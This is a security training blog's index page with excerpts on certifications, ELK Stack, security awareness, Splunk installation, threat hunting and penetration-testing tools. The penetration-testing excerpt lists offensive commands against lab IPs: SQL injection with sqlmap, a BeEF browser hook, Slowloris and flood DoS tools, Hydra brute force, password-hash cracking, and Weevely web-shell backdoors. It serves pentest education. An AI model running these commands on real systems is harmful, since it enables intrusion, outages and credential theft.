Blog

Latest News From Blog

Image Network Security

Top Network Security Certifications and How to Choose the Right One for You

Network security is an organization’s first line of defense against hackers and other cyber threats. Thanks to projections that cybercrime is expected to inflict $6 trillion worth of damage around the world in 2021, we can see why network security has risen in prominence. However, just like there are many different forms of cyberattacks, there are a dizzying array of cybersecurity certifications to choose from.Although having so many cybersecurity choices is arguably a good thing, the sheer number and variety also pose a challenge. It’s easy to get overwhelmed by the number of choices, sometimes to the point of not making a choice at all. What are the top network security certifications? Which one(s) are right for you and your organization? Are any of the top cyber security certifications universally applicable?In this article, we are going to shine the spotlight on various topics, including:What is network security?The need for network securityVarious types of network securityNetwork security jobs and salariesBest network security certificationsWhat is Network Security?Most experts define network security as the policies and practices of taking protective measures for protecting network infrastructure from trespassing, illegal access, modification, abuse, change, destruction, or the unauthorized gathering and release of data. The full process requires a combination of hardware devices, security software, and user awareness of security procedures and techniques.The latter element can range from employees getting briefed on proper security practices, to professionals who have taken network security training. Why is Network Security Needed?So many aspects of our lives have migrated to the digital world. We use the internet to conduct financial transactions, communicate with family and colleagues, make purchases, seek entertainment, and engage in research. So much of our personal information resides online, everything from birth dates, Social Security (or other identification numbers), health history, credit history, bank accounts, utility bills, and a host of other things.All that data and all those transactions are vulnerable to hackers and cybercriminals. The more of our lives we commit to the internet, the higher the risk of compromise. Moreover, the continuing importance of the Internet of Things (IoT) means even more reliance on wireless networks, which only increases the threat landscape, giving criminals more avenues and opportunities to perpetrate fraud. There is too much at stake in our personal and commercial lives to let network security slip. So, what types of network security are there?What Are the Types of Network Security?There is a whole arsenal of network security tools, methods, and practices available for cybersecurity professionals. Here’s a high-level overview:SoftwareSecurity software resources include anti-virus, anti-malware, and anti-spyware. These tools are available as suites or as subscriptions, updated continuously by the hosting vendor to keep up with the latest threats. These applications monitor your network, blocking intruders, malware, and viruses.As an aside, it’s extremely wise to opt for a security subscription as opposed to getting a suite and loading it in-house. Subscription providers/vendors are in a better position to deal with the constant changes to the cyber security landscape. There seems to be a new cyber threat or virus emerging every day, and your software won’t defend against threats it doesn’t yet know exist. That’s why it’s better to leave that heavy lifting to the subscription provider.Password ProtectionThis is such a simple measure but is extremely important. Strong passwords are an inexpensive yet effective way of keeping systems, applications, and networks safe, and you don’t have to be a seasoned cybersecurity professional to put strong passwords into practice. And when we say “strong” passwords, we don’t mean ridiculous ones like “password” or “99999”.FirewallsIf you picture your network as an exclusive nightclub, then the firewall would be the bouncer, working the door and keeping out undesirables. They filter traffic (incoming and outgoing), based on predetermined policies, preventing unauthorized users from coming in. Anyone who’s tried to work remotely but was locked out of their company’s main systems due to not having the right authorization, has experienced first-hand the effectiveness of a firewall.Email Security SoftwareEmail is a very vulnerable point in any network. Cybercriminals love to send bogus emails that look like correspondence from legitimate companies and financial institutions. But just one click of a link embedded in these fraudulent emails could be enough to compromise your system. To that end, email security software can not only filter out incoming threats, but it can also even prevent certain kinds of data from being transmitted.Segmented NetworksThis process sorts and divides traffic based on specific established criteria. Segmented networks are especially useful for limiting users to just one area, specifically the one they need to do their work while keeping these users out of the data that’s outside of their wheelhouse. Restricting users like this helps decrease the overall network’s weak spots.Which are the Best Network Security Certifications?Before you can make big bucks in the network security field, you need to learn the tools and skills. That’s where network security training comes in. Network security certification courses not only give you the essential knowledge for these positions, but they also give you that valuable certificate that shows prospective employers that you have the required qualifications.Let’s dig into some of the major network security certifications.1. CEH: Certified Ethical HackerAlso known as “white hat hackers,” these are IT security professionals whose job is to try and penetrate systems and find vulnerabilities. Businesses and organizations hire them to find weaknesses in the system and figure out how to fix them. When you consider how important cybersecurity has become, it’s unsurprising that this certification is such a sought-after commodity.2. CISSP: Certified Information Systems Security ProfessionalThis certification is for experienced security professionals who are responsible for the development and management of their organization’s security procedures, policies, and standards. It is perfect for IT security professionals who want to take their careers to the next level.3. CISM: Certified Information Security ManagerThis certification is a critical resource for IT professionals who have enterprise-level security management responsibilities. They manage, develop, and oversee security systems and develop organizational best practices.4. CCSP: Certified Cloud Security ProfessionalThis certification has become highly sought after thanks to many organizations increasingly migrating to the cloud. The course focuses on IS and IT professionals who apply best practices to cloud security architecture, design, operations, and service orchestration. If you work with cloud platforms, this is a must.5. CISA: Certified Information Systems AuditorThis certification target IS professionals who focus primarily on audit control, assurance, and security. It provides you with the skills required to govern and control enterprise IT and perform an effective security audit. 

Read More
Image SEIM Technology

ELK Stack : Get Started with Elasticsearch, Logstash, Kibana, & Beats

IntroductionElastic Stack, formerly known as the ELK stack, is a popular suite of tools for ingesting, viewing, and managing log files. As open-source software, you can download and use it for free (though fee-based and cloud-hosted versions are also available).PrerequisitesA system with Elasticsearch installedWhat is ELK Stack?ELK stands for Elasticsearch, Logstash, and Kibana. In previous versions, the core components of the ELK Stack were:Elasticsearch – The core component of ELK. It works as a searchable database for log files.Logstash – A pipeline to retrieve data. It can be configured to retrieve data from many different sources and then send it to Elasticsearch.Kibana – A visualization tool. It uses a web browser interface to organize and display data.Additional software packages called Beats are a newer addition. These are smaller data collection applications, specialized for individual tasks. There are many different Beats applications for different purposes. For example, Filebeat is used to collect log files, while Packetbeat is used to analyze network traffic.Due to the ELK acronym quickly growing, the Elastic Stack became the more satisfactory and scalable option for the name. However, ELK and Elastic Stack are used interchangeably.Why Use ELK Stack?The ELK stack creates a flexible and reliable data parsing environment. Organizations, especially ones with cloud-based infrastructures, benefit from implementing the Elastic stack to address the following issues:Working on various servers and applications creates large amounts of log data, which is not human-readable. The ELK stack serves as a powerful centralized platform for collecting and managing unstructured information, turning it into useful assets in the decision-making process.The ELK stack with basic features is open source, which makes it a cost-efficient solution for startups and established businesses alike.The Elastic stack provides a robust platform for performance and security monitoring, ensuring maximal uptime and regulation compliance.The Elastic stack addresses the industry gap with log data. The software can reliably parse data from multiple sources into a scalable centralized database, allowing both historic and real-time analysis.How Does Elastic Stack Work?The Elastic stack follows certain logical steps, all of which are configurable.1. A computer or server creates log files. All computers have log files that document events on the system in a hard-to-read format. Some systems, such as server clusters, generate massive amounts of log files.However, Elastic Stack is designed to help manage scalable amounts of data.2. The various available information files are collected by a Beats application. Different Beats reach out to different parts of the server, read the files, and ship them out.Some users may skip Beats altogether and use Logstash directly. Others may connect Beats directly to Elasticsearch.3. Logstash is configured to reach out and collect data from the different Beats applications (or directly from various sources).In larger configurations, Logstash can filter data from multiple systems, and collect the information into one location.4. Elasticsearch is used as a scalable, searchable database to store data. Elasticsearch is the warehouse where Logstash or Beats pipe all the data.5. Finally, Kibana provides a user-friendly interface for you to review the data that’s been collected.It is highly configurable, so you can adjust the metrics to fit your needs. Kibana also provides graphs and other tools to visualize and interpret patterns in the data.ELK Stack Supporting ApplicationsAdditional third-party applications enhance the Elastic Stack, providing wider use-case possibilities. Some external applications supported by the ELK stack are:Apache KafkaKafka is a real-time streaming distribution platform. That means that it can read multiple data sources at once. Kafka acts as a data buffer and helps prevent data loss or interruption while streaming files quicklyRedisRedis is a NoSQL key-value database with incredible read/write speeds and various data types. When added to the Elastic stack, Redis often serves as a buffer for data stream spikes, ensuring no data is lost.HadoopHadoop is a massive batch-processing data storage system. Indexing data from Hadoop into the real-time Elasticsearch engine creates an interactive bi-directional data discovery and visualization platform.The Hadoop support comes through the Elasticsearch-Hadoop Connector, offering full support for Spark, Streaming, Hive, Storm, MapReduce, and other tools.RabbitMQRabbitMQ is a messaging platform. Elastic Stack users use this software to build a stable, buffered queue of log files.NginxNginx is best known as a web server that can also be set up as a reverse proxy. It can be used to manage network traffic or to create a security buffer between your server and the internet.ELK Stack Advantages and DisadvantagesThe Elastic stack comes with certain benefits and drawbacks.AdvantagesThe Elastic stack and the components are free to try out and use.ELK offers numerous hosting options, whether on-premises or deployed as a managed service.The capability to centralize logging from complex cloud environments allows advanced searches and creating correlations from multiple sources on a single platform.Real-time analysis and visualization decrease the time taken to discover insights, enabling continual monitoring.Client support for multiple programming languages, including JavaScript, Python, Perl, Go, etc.DisadvantagesDeploying the stack is a complex process and depends on the requirements. Check out our tutorial for deploying the Elastic stack on Kubernetes.Growing and maintaining the ELK stack is costly and requires computing and data storage based on the data volume and storage time.

Read More
Image Other

Security Awareness -2023

What is Security Awareness?Let’s start with a clear understanding of the three different types of learning activities that organizations use, whether for information security or for any other purpose:Education: The overall goal of education is to help learners improve their understanding of these ideas and their ability to relate them to their own experiences and apply that learning in useful ways.Training: Focuses on building proficiency in a specific set of skills or actions, including sharpening the perception and judgment needed to make decisions as to which skill to use, when to use it, and how to apply it. Training can focus on low-level skills, an entire task, or complex workflows consisting of many tasks.Awareness: These are activities that attract and engage the learner’s attention by acquainting them with aspects of an issue, concern, problem, or need.You’ll notice that none of these have an expressed or implied degree of formality, location or target audience. (Think of a newly hired senior executive with little or no exposure to the specific compliance needs your organization faces; first, someone has to get their attention and make them aware of the need to understand. The rest can follow.)Security Awareness Examples -2023Let’s look at an example of security awareness training by using an organization’s strategy to improve fire safety in the workplace:Education may help workers in a secure server room understand the interaction of the various fire and smoke detectors, suppression systems, and alarms and their interactions with electrical power, lighting, and ventilation systems.Training would provide those workers with task-specific, detailed learning about the proper actions each should take in the event of an alarm, a suppression system going off without an alarm, a ventilation system failure, or other contingencies. This training would build on the learning acquired via the educational activities.Awareness activities would include not only posting the appropriate signage, and floor or doorway markings but also other indicators to help workers detect an anomaly, respond to an alarm and take appropriate action. In this case, awareness is a constantly available reminder of what to do when the alarms go off.Translating that into an anti-phishing campaign might be done by:Education may be used to help select groups of users better understand the ways in which social engineering attacks are conducted and engage those users in creating and testing their own strategies for improving their defensive techniques.Training will help users increase their proficiency in recognizing a potential phishing or similar attempt, while also helping them practice the correct responses to such events. Training may include simulated phishing emails sent to users on a network to test their ability to identify a phishing email.Raising users’ overall awareness of the threat posed by phishing, vishing, SMS phishing (also called “smishing), and other social engineering tactics. Awareness techniques can also alert selected users to new or novel approaches that such attacks might be taking.Let’s look at some common risks and why it’s important to include them in your security awareness training programs.PhishingThe use of phishing attacks to target individuals, entire departments, and even companies is a significant threat that the security professional needs to be aware of and be prepared to defend against. Countless variations on the basic phishing attack have been developed in recent years, leading to a variety of attacks that are deployed relentlessly against individuals and networks in a never-ending stream of emails, phone calls, spam, instant messages, videos, file attachments, and many other delivery mechanisms. Phishing attacks that attempt to trick highly placed officials or private individuals with sizable assets into authorizing large fund wire transfers to previously unknown entities are known as whaling attacks.Social EngineeringSocial engineering is an important part of any security awareness training program for one very simple reason: bad actors know that it works. For cyber attackers, social engineering is an inexpensive investment with a potentially very high payoff. Social engineering, applied over time, can extract significant insider knowledge about almost any organization or individual. One of the most important messages to deliver in a security awareness program is an understanding of the threat of social engineering. People need to be reminded of the threat and types of social engineering so that they can recognize and resist a social engineering attack. Most social engineering techniques are not new. Many have even been taught as basic fieldcraft for espionage agencies and are part of the repertoire of investigative techniques used by real and fictional police detectives. A short list of the tactics that we see across cyberspace currently includes:Phone phishing or vishing: Using a rogue interactive voice response (IVR) system to re-create a legitimate-sounding copy of a bank or other institution’s IVR system. The victim is prompted through a phishing email to call the “bank” via a provided phone number to verify information such as account numbers, account access codes or a PIN and to confirm answers to security questions, contact information and addresses. A typical vishing system will reject logins continually, ensuring the victim enters PINs or passwords multiple times, often disclosing several different passwords. More advanced systems may be used to transfer the victim to a human posing as a customer service agent for further questioning.Pretexting: The human equivalent of phishing, where someone impersonates an authority figure or a trusted individual in an attempt to gain access to your login information. The pretext may claim to be an IT support worker who is supposed to do maintenance or an investigator performing a company audit. Or they might impersonate a coworker, the police, the tax authority, or some other seemingly legitimate person. The goal is to gain access to your computer and information.Quid pro quo: A request for your password or login credentials in exchange for some compensation, such as a “free gift,” a monetary payment, or access to an online game or service. If it sounds too good to be true, it probably is.Tailgating: The practice of following an authorized user into a restricted area or system. The low-tech version of tailgating would occur when a stranger asks you to hold the door open behind you because they forgot their company RFID card. In a more sophisticated version, someone may ask to borrow your phone or laptop to perform a simple action when he or she is actually installing malicious software onto your device.Social engineering works because it plays on human tendencies. Education, training, and awareness work best to counter or defend against social engineering because they help people realize that every person in the organization plays a role in information security.Password ProtectionWe use many different passwords and systems. Many password managers will store a user’s passwords for them so the user does not have to remember all their passwords for multiple systems. The greatest disadvantage of these solutions is the risk of compromising of the password manager. These password managers may be protected by a weak password or passphrase chosen by the user and easily compromised. There have been many cases where a person’s private data was stored by a cloud provider but easily accessed by unauthorized persons through password compromise. Organizations should encourage the use of different passwords for different systems and should provide a recommended password management solution for its users. Examples of poor password protection that should be avoided are:Reusing passwords for multiple systems, especially using the same password for business and personal use.Writing down passwords and leaving them in unsecured areas.Sharing a password with tech support or a co-worker. 

Read More
Image Web Application Security

Tools for Penetration Testing

While producing high-technology mobile apps and websites, there’s no way without security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection and elimination, as well as prevention of any web security attacks.What is Penetration Testing?The idea behind any penetration testing is to identify security-related vulnerabilities in a software application by conducting a security attack to determine how much damage a hacker may cause when trying to hack the product. The results of this practice help to make applications and software more secure, robust, and unbreakable, and the users’ experience – more successful.So, if you are going to develop and use any software for your business, the automated penetration testing method will help you to check network security threats.How Penetration Tests WorkPenetration testing is a simulated real-time cyber-attack conducted by certified security professionals (hackers) under secure conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to further malicious code injections, malware, unauthorized entries, attacks, etc.Application testers then try and exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of damage they may cause. However, it’s hard to find all possible vulnerabilities using automated tools. There are some threats that can only be identified by manual system scans.To uncover the security vulnerabilities which can be found in any type or kind of Web Application, we may find three major tests types, which are as follows:Black Box Testing;White Box Testing;Gray Box Testing.Black box testing: A black box assessment is mostly performed without any knowledge of the system’s internals. Here testers check out the system solely from the outside. They have no idea of what is happening within the system to generate responses and test actions.White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system that’s being tested (design docs, source code, etc.).Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.Best Penetration Testing01. Database Tools Usagesqlmapautomates the process of detectingand exploiting SQL injection flaws and taking over of database serverssqlmap –u victim_url sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686;rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 02. CMS Scanning ToolsWPScanwpscan --version wpscan –u URL of webpage”. Joomscanjoomscan –h joomscan –-version joomscan /? joomscan –u victim_url 03. SSL Scanning ToolsTLSSLedtlssled URL port w3afwww audi frameworkstartw3af enter the URL of victimstart04. Metasploitmsfupdate msf > search name:Microsoft type:exploit. ArmitageMetaGUIBeEFbeef-xss username and password: beef.<script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script> Linux Exploit Suggesterroot@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0Forensics Toolsp0f identify the operating system of a target host simply by examining captured packetsIn the hands of advanced users, P0f can detect firewallpresence, NAT use, and existence of load balancers.p0f –-version p0f -h p0f –i eth0 –p -o filename open 192.168.1.2pdf-parserparses a PDF document to identify the fundamental elements usedin the analyzed pdfpdf-parser -o 10 filepath dumpzillaextract all forensicinteresting information of Firefox, Iceweasel, and Seamonkey browsersddrescuecopies data from one file or block device (hard disc, cdrom, etc.) to another, trying torescue the good parts first in case of read errors.dd_rescue infilepath outfilepath dd_rescue -v /dev/sdb ~/sec.img DFFdff-guiSocial EngineeringSocial Engineering Toolkitsudo apt install sendmail vim config/set_config # SENDMAIL=OFF flag to SENDMAIL=ON. 05. Stressing ToolsDoS attacks or to create the stress test for differentapplications so as take appropriate measures for the future.Slowhttptestslowhttptest --version slowhttptest -h # sampel slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u http://192.168.1.202/index.php -x 24 -p 2 Where,(-c 500) = 500 connections(-H) = Slowloris mode-g = Generate statistics-o outputfile = Output file name-i 10 = Use 10 seconds to wait for data-r 200 = 200 connections with -t GET = GET requests-u http://192.168.1.202/index.php = target URL-x 24 = maximum of length of 24 bytes-p 2 = 2-second timeoutInvitefloodSIP/SDP INVITE message flooding over UDP/IP.inviteflood --version # format inviteflood eth0 target_extension target_domain target_ip number_of_packets # sample inviteflood eth0 2000 192.168.x.x 192.168.x.x 1 Where,target_extension is 2000target_domain is 192.168.x.xtarget_ip is 192.168.x.xnumber_of_packets is 1-a is alias of SIP accountIaxfloodVoIP DoS tooliaxflood –-version iaxflood –h iaxflood sourcename destinationname numpackets iaxflood ip_src ip_dest packets thc-ssl-dosverify the performance of SSLEstablishing a secure SSL connection requires 15x more processing power on the server than on the client.# format thc-ssl-dos victimIP httpsport –accept # examp thc-ssl-dos 192.168.1.1 443 –accept 06. Sniffing & SpoofingBurpsuitethe sniffing tool between your browser and the webservers to findthe parameters that the web application usesmitmproxySSL-capable man-in-the-middle HTTP proxy.mitmproxy –-version mitmproxy –h mitmproxy –p portnumber mitmproxy –p 80 07.WiresharksslstripMITM attack that forces a victim's browser to communicate in plain-text over HTTPsslstrip --version sslstrip -h sslstrip -p 80 08. Password Cracking ToolsHydralogin cracker that supports many protocols to attackhydra -l /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V JohnnyGUI for the John the Ripper password cracking toolJohnCLI for Johnny GUI.unshadow passwd shadow > unshadowed.txt Rainbowcrack cracks hashes by rainbow table lookup.rcrack -h rcrack path_to_rainbow_tables -f path_to_password_hash rcrack path_to_rainbow_tables -f path_to_password_hash ./rcrack . -h 5d41402abc4b2a76b9719d911017c592 ./rcrack . -l hash.txt SQLdict09.dictionary attack tool for SQL serversqldict Under “Target IP Server”,Under “Target Account”, enter the username.load the file with the passwordstarthash-identifieridentify types of hasheshash-identifier 5d41402abc4b2a76b9719d911017c592 10.Maintaining Accessuses to maintain connection and for access toa hacked machine even when it connects and disconnects again.Powersploithelp to connect with the victim’s machine via PowerShell.cd /usr/share/powersploit/ Sbdsimilar to Netcatfeatures AES-CBC-128 + HMAC-SHA1 encryption# server sbd -l -p 44 # visctim sbd 192.168.43.2 44 WeevelyPHP web shell that simulate telnet-like connectionused as a stealth backdoor# check weevely -h # format weevely generate password pathoffile # sample weevely generate adm1n123 ~/Desktop/about1.php # formart weevely URL password # sample weevely http://198.168.32.13 adm1n123 http-tunnelcreates a bidirectional virtual data stream tunneled in HTTP requestsThis can be useful for users behind restrictive firewalls.# server httptunnel_server –h # client httptunnel_client –h cryptcatsimilar to Netcat which allows to make TCP and UDP connection with a victim’smachine in an encrypted way# server cryptcat –l –p port –n # client cryptcat IPofServer PortofServer 11.Reverse EngineeringOllyDbg32-bit assembler level analyzing debugger for MS Windows applicationsused to crack the commercial softwares.startollydbg dex2jarconvert APK file (android) to JAR file in order to view the source code.d2j-dex2jar –d /file location d2j-dex2jar –d ~/Desktop/class.dex jd-guistandalone graphical utility that displays Java source codes of “.class” files.jd-gui apktoolbest tools to reverse the whole android applicationapktool # decompile apktool d apk file 12.Reporting ToolsDradisservice dradis start dradis open https://machine_ip:3004import files from NMAP, NESSUS, NEXPOSEMetagoofilsearch in Google to identify and download the documents to the localdisk and then extracts the metadata# help metagoofil -h metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res –d (domain name)–t (filetype to download dox,pdf,etc)–l (limit the results 10, 100 )–n (limit files to download)–o ( location to save the files)–f (output file)Miscstrace# sample strace –e trace=network,read,write /path/to/app args # example strace -e trace=network,read,write customapp

Read More
Image SEIM Technology

How to Install Splunk on Ubuntu server?

In this article, I'll explain how to install the latest Splunk on an Ubuntu server. Splunk is aimed to process the data to make it useful for the user without manipulating the original data. It is one of the most powerful tools for analyzing, exploring, and searching data. It is one of the easiest way to index, search, collect and visualize massive data streams in real-time from the application, web servers, databases, server platforms, Cloud-networks, and many more.Splunk ArchitectureThere are three main components in Splunk as shown below:Splunk ForwarderSplunk IndexerSplunk Search headAs you can see Splunk Forwarder is used for data forwarding. It is the component that is used for collecting the logs. Splunk Indexer is the one used for Parsing and Indexing the data. Splunk instance transforms the incoming data into events and stores it in indexes for performing search operations efficiently. Lastly the Splunk Search Head is a Graphical interface used for searching, analyzing, and reporting.Installing Splunk on Ubuntu 18.04Create a Splunk account and download the  Splunk Enterprise Software from their official website here.Now upload the downloaded file to your Ubuntu 18.04 server and place it in a temporary directory. Next, we can run the dpkg command to install the Splunk server.# dpkg -i splunk-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb Selecting previously unselected package splunk. (Reading database ... 66600 files and directories currently installed.) Preparing to unpack splunk-7.1.0-2e75b3406c5b-linux-2.6-amd64.deb ... Unpacking splunk (7.1.0) ... Setting up splunk (7.1.0) ... completeSecondly, we need to create the init.d script so that we can easily start and stop Splunk. Change to the Splunk binary directory at /opt/splunk/bin/  and run Splunk executable with the below arguments.#cd /opt/splunk/bin/ # ./splunk enable boot-start Splunk Software License Agreement 04.24.2018 Do you agree with this license? [y/n]: y Do you agree with this license? [y/n]: y This appears to be your first time running this version of Splunk. An Admin password must be set before installation proceeds. Password must contain at least: * 8 total printable ASCII character(s). Please enter a new password: Please confirm new password: Copying '/opt/splunk/etc/openldap/ldap.conf.default' to '/opt/splunk/etc/openldap/ldap.conf'. Generating RSA private key, 2048 bit long modulus .......+++ ................+++ e is 65537 (0x10001) writing RSA key Generating RSA private key, 2048 bit long modulus .............................................................+++ ............+++ e is 65537 (0x10001) writing RSA key Moving '/opt/splunk/share/splunk/search_mrsparkle/modules.new' to '/opt/splunk/share/splunk/search_mrsparkle/modules'. Init script installed at /etc/init.d/splunk. Init script is configured to run at boot.During this process, you can Press the Spacebar to go through the license agreement and then type Y to accept it as shown in the installation logs. Finally, we can start the Splunk Service with the command below:# service splunk startNow you can access your Splunk Web interface at http://Server-IP:8000/ or http://Server-hostname:8000 . You need to make sure this port 8000 is open on your server firewall.You can provide the admin login credentials created during the installation phase to access your Splunk GUI interface. Once you logged in, you will have your Splunk Dashboard ready to use.There are different categories listed over on the home page. You can choose the required one and start Spelunking.Adding a taskI'm adding an example for a simple task which is been added to the Splunk system. Just see my snapshots to understand how I added it. My task is to add /var/log folder to the Splunk system for monitoring.Step1:Open up the Splunk Web interface and choose the Add Data option to start with.Step 2:The Add Data Tab opens up with three options: Upload, Monitor, and Forward. Each option is self-explanatory with a short description of the purpose. Here our task is to monitor a folder, so we go ahead with Monitor.In the Monitor option, there are four categories as below:Files & Directories: To monitor files/foldersHTTP Event Collector: Monitor data streams over HTTPTCP/ UDP: Monitor traffic over the TCP/UDP portsScripts: Monitor Custom Scripts or CommandsStep 3:According to our purpose, I choose the Files & Directories option.Step 4:Now, I'm browsing the exact folder path /var/log from the server to monitor. Once you select the settings, you can click Next and Review.Once all your settings are reviewed, you can click 'Submit' to conclude.Step 5:Now you have added successfully your data source to Splunk for monitoring. You can start searching and monitoring the log file as required. I have narrowed down the logs to Apache application on the server.This is just a simple example of Splunking, you can add as many tasks to this and explore your local or remote server data. It also provides you with tools to create tables and visualizations using multiple fields and metrics depending on your log analysis.

Read More
Image Other

What is Threat Hunting?

Threat Hunting is a security function that combines proactive methodology, innovative technology, and threat intelligence to find and stop malicious activities.For companies that are ready to take on a more proactive approach to cyber security – one that attempts to stop attacks before they get too deep – adding threat hunting to their security program is the next logical step.After solidifying their endpoint security and incident response strategies to mitigate the known malware attacks that are inevitable today, organizations can then start to go on the offensive. They are ready to dig deep and find what hasn’t yet been detected – and that’s exactly the purpose of threat hunting.Threat hunting is an aggressive tactic that works from the premise of the “assumption of the breach;” that attackers are already inside an organization’s network and are covertly monitoring and moving throughout it. This may seem far-fetched, but in reality, attackers may be inside a network for days, weeks, and even months on end, preparing and executing attacks such as advanced persistent threats, without any automated defense detecting their presence. Threat hunting stops these attacks by seeking out covert indicators of compromise (IOCs) so they can be mitigated before any attacks achieve their objectives.The Key Elements of Threat HuntingThe goal of threat hunting is to monitor everyday activities and traffic across the network and investigate possible anomalies to find any yet-to-be-discovered malicious activities that could lead to a full-blown breach. To achieve this level of early detection, threat hunting incorporates four equally important components:Methodology. To be successful at threat hunting, companies must commit to a proactive, full-time approach that is ongoing and ever-evolving. A reactive, ad hoc, “when we have time” perspective will be self-defeating and net only minimal results.Technology. Most companies already have comprehensive endpoint security solutions with automated detection in place. Threat hunting works in addition to these and adds advanced technologies to find anomalies, unusual patterns, and other traces of attackers that shouldn’t be in systems and files. New cloud-native endpoint protection platform (EPP)s that leverage big data analytics can capture and analyze large volumes of unfiltered endpoint data, while behavioral analytics and artificial intelligence can provide extensive, high-speed visibility into malicious behaviors that seem normal at the outset.Highly skilled, dedicated personnel. Threat hunters, or cybersecurity threat analysts, are a breed of their own. These experts not only know how to use the security technology mentioned, but they also combine a relentless aspiration to go on the offensive with intuitive problem-solving forensic capabilities to uncover and mitigate hidden threats.Threat intelligence. Having access to evidence-based global intelligence from experts around the world further enhances and expedites the hunt for already existing IOCs. Hunters are aided by information such as attack classifications for malware and threat group identification, as well as advanced threat indicators that can help zero in on malicious IOCs.Research from the 2018 Threat Hunting Report from Crowd Research Partners confirms the importance of these threat-hunting capabilities. When asked to rank the most important capability the survey found:69% chose threat intelligence57% chose behavior analytics56% chose automatic detection54% chose machine learning and automated analyticsThreat hunters look for attackers that get in under the radar, through vulnerabilities a company may not even know exists. These attackers spend considerable amounts of time planning and performing reconnaissance, only acting when they know they can successfully penetrate the network without notice. They also plant and build malware that has yet to be recognized or use techniques that don’t rely on malware at all, to set themselves up with a persistent base from which to attack.A Profile of a Prolific Threat HunterSo what does it take to outsmart even the smartest attackers?Cyber threat hunters are relentless and able to find even the most minute trace of what cyber attackers leave behind.Threat hunters use their highly tuned skills to zero in on the slight changes that occur as the attackers make their moves inside a system or file.The best threat hunters rely on their instincts to sniff out the most nefarious attacker’s stealth moves.

Read More